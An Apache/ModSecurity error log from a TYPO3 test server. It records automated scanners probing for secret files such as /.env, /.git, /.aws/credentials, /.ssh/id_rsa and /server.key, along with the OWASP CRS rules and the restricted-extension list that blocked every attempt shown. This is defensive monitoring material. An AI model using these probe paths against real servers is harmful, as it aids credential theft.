[Wed Dec 11 04:17:22.853722 2024] [authz_core:error] [pid 3890142] [client 18.156.35.7:39548] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Dec 11 06:14:02.043603 2024] [authz_core:error] [pid 3890144] [client 103.102.230.8:49644] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Dec 18 20:27:15.664823 2024] [:error] [pid 4089178] [client 45.148.10.172:54476] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z2MiExgshzY7IUZbHZRXIwAAAAY"]
[Wed Dec 18 20:27:15.666734 2024] [:error] [pid 4089178] [client 45.148.10.172:54476] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z2MiExgshzY7IUZbHZRXIwAAAAY"]
[Wed Dec 18 20:27:15.667248 2024] [:error] [pid 4089178] [client 45.148.10.172:54476] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z2MiExgshzY7IUZbHZRXIwAAAAY"]
[Wed Dec 18 23:58:39.943454 2024] [authz_core:error] [pid 4089178] [client 45.148.10.86:39410] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Dec 19 00:16:26.188007 2024] [:error] [pid 4092484] [client 45.148.10.172:42572] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z2NXyiWGMDNNtgua9ECZhQAAAAc"]
[Thu Dec 19 00:16:26.188672 2024] [:error] [pid 4092484] [client 45.148.10.172:42572] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z2NXyiWGMDNNtgua9ECZhQAAAAc"]
[Thu Dec 19 00:16:26.189157 2024] [:error] [pid 4092484] [client 45.148.10.172:42572] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z2NXyiWGMDNNtgua9ECZhQAAAAc"]
[Sun Dec 22 00:39:57.914801 2024] [authz_core:error] [pid 4157940] [client 54.234.30.149:59466] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Dec 22 17:02:32.736560 2024] [authz_core:error] [pid 4160381] [client 103.102.230.8:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Dec 28 18:50:10.831885 2024] [:error] [pid 94121] [client 103.247.19.55:41554] [client 103.247.19.55] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3A6UiEDvQT-Nfhnc_D3cgAAAAU"]
[Sat Dec 28 18:50:10.833969 2024] [:error] [pid 94121] [client 103.247.19.55:41554] [client 103.247.19.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3A6UiEDvQT-Nfhnc_D3cgAAAAU"]
[Sat Dec 28 18:50:10.834348 2024] [:error] [pid 94121] [client 103.247.19.55:41554] [client 103.247.19.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3A6UiEDvQT-Nfhnc_D3cgAAAAU"]
[Sun Jan 05 19:10:15.825943 2025] [authz_core:error] [pid 265380] [client 45.130.203.231:2783] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 06 11:18:34.407484 2025] [:error] [pid 287919] [client 45.130.203.192:42285] [client 45.130.203.192] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut-uxxcoaa2oN2JtdEawAAAAg"]
[Mon Jan 06 11:18:34.407721 2025] [:error] [pid 287919] [client 45.130.203.192:42285] [client 45.130.203.192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut-uxxcoaa2oN2JtdEawAAAAg"]
[Mon Jan 06 11:18:34.407989 2025] [:error] [pid 287919] [client 45.130.203.192:42285] [client 45.130.203.192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut-uxxcoaa2oN2JtdEawAAAAg"]
[Wed Jan 22 06:35:59.201736 2025] [authz_core:error] [pid 634938] [client 209.38.208.202:51694] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Wed Jan 22 06:35:59.447519 2025] [:error] [pid 634937] [client 209.38.208.202:51732] [client 209.38.208.202] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z5CDvzo-s-UAegLxuOPnNwAAAAM"]
[Wed Jan 22 06:35:59.447953 2025] [:error] [pid 634937] [client 209.38.208.202:51732] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z5CDvzo-s-UAegLxuOPnNwAAAAM"]
[Wed Jan 22 06:35:59.448303 2025] [:error] [pid 634937] [client 209.38.208.202:51732] [client 209.38.208.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z5CDvzo-s-UAegLxuOPnNwAAAAM"]
[Wed Jan 22 06:35:59.503227 2025] [:error] [pid 634934] [client 209.38.208.202:51744] [client 209.38.208.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5CDvzniFBR4YGRCws1tpQAAAAE"]
[Wed Jan 22 06:35:59.503809 2025] [:error] [pid 634934] [client 209.38.208.202:51744] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5CDvzniFBR4YGRCws1tpQAAAAE"]
[Wed Jan 22 06:35:59.504290 2025] [:error] [pid 634934] [client 209.38.208.202:51744] [client 209.38.208.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5CDvzniFBR4YGRCws1tpQAAAAE"]
[Wed Jan 22 06:35:59.556454 2025] [authz_core:error] [pid 634949] [client 209.38.208.202:51752] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jan 22 17:19:08.080492 2025] [:error] [pid 634951] [client 45.148.10.172:38098] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5EafM5fjOZJqrjfjGyQsQAAAAc"]
[Wed Jan 22 17:19:08.081187 2025] [:error] [pid 634951] [client 45.148.10.172:38098] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5EafM5fjOZJqrjfjGyQsQAAAAc"]
[Wed Jan 22 17:19:08.081499 2025] [:error] [pid 634951] [client 45.148.10.172:38098] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5EafM5fjOZJqrjfjGyQsQAAAAc"]
[Wed Jan 22 23:46:21.791293 2025] [authz_core:error] [pid 646194] [client 52.63.44.47:58228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 23 03:14:52.205214 2025] [:error] [pid 654460] [client 45.148.10.172:36434] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5GmHFpDNFyZE1VJHqsMlAAAAAA"]
[Thu Jan 23 03:14:52.206032 2025] [:error] [pid 654460] [client 45.148.10.172:36434] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5GmHFpDNFyZE1VJHqsMlAAAAAA"]
[Thu Jan 23 03:14:52.206536 2025] [:error] [pid 654460] [client 45.148.10.172:36434] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5GmHFpDNFyZE1VJHqsMlAAAAAA"]
[Thu Jan 23 16:36:06.267919 2025] [:error] [pid 654463] [client 109.202.99.36:37865] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z5Jh5qjsLodR8zMp-ZrKOQAAAAM"]
[Thu Jan 23 16:36:06.268159 2025] [:error] [pid 654463] [client 109.202.99.36:37865] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z5Jh5qjsLodR8zMp-ZrKOQAAAAM"]
[Thu Jan 23 16:36:06.268475 2025] [:error] [pid 654463] [client 109.202.99.36:37865] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z5Jh5qjsLodR8zMp-ZrKOQAAAAM"]
[Thu Jan 23 16:36:06.270061 2025] [:error] [pid 654462] [client 109.202.99.36:18511] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDQAAAAI"]
[Thu Jan 23 16:36:06.270468 2025] [:error] [pid 654462] [client 109.202.99.36:18511] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDQAAAAI"]
[Thu Jan 23 16:36:06.270719 2025] [:error] [pid 654462] [client 109.202.99.36:18511] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z5Jh5pRUO7PUQ45jTtdZDQAAAAI"]
[Thu Jan 23 16:36:06.347600 2025] [authz_core:error] [pid 662367] [client 109.202.99.36:65387] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Thu Jan 23 16:36:06.349662 2025] [authz_core:error] [pid 654477] [client 109.202.99.36:27219] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Thu Jan 23 16:36:06.439462 2025] [:error] [pid 654461] [client 109.202.99.36:55537] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXowAAAAE"]
[Thu Jan 23 16:36:06.439877 2025] [:error] [pid 654461] [client 109.202.99.36:55537] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXowAAAAE"]
[Thu Jan 23 16:36:06.440261 2025] [:error] [pid 654461] [client 109.202.99.36:55537] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXowAAAAE"]
[Thu Jan 23 16:36:06.598035 2025] [:error] [pid 662042] [client 109.202.99.36:33553] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z5Jh5qz1zt3nVY0mhdCO2gAAAAg"]
[Thu Jan 23 16:36:06.606607 2025] [:error] [pid 662042] [client 109.202.99.36:33553] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z5Jh5qz1zt3nVY0mhdCO2gAAAAg"]
[Thu Jan 23 16:36:06.606899 2025] [:error] [pid 662042] [client 109.202.99.36:33553] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z5Jh5qz1zt3nVY0mhdCO2gAAAAg"]
[Thu Jan 23 16:36:06.607998 2025] [authz_core:error] [pid 654463] [client 109.202.99.36:36831] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Thu Jan 23 16:36:06.693350 2025] [:error] [pid 654461] [client 109.202.99.36:57469] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z5Jh5u5vOoJuFFjgrDVXpAAAAAE"]
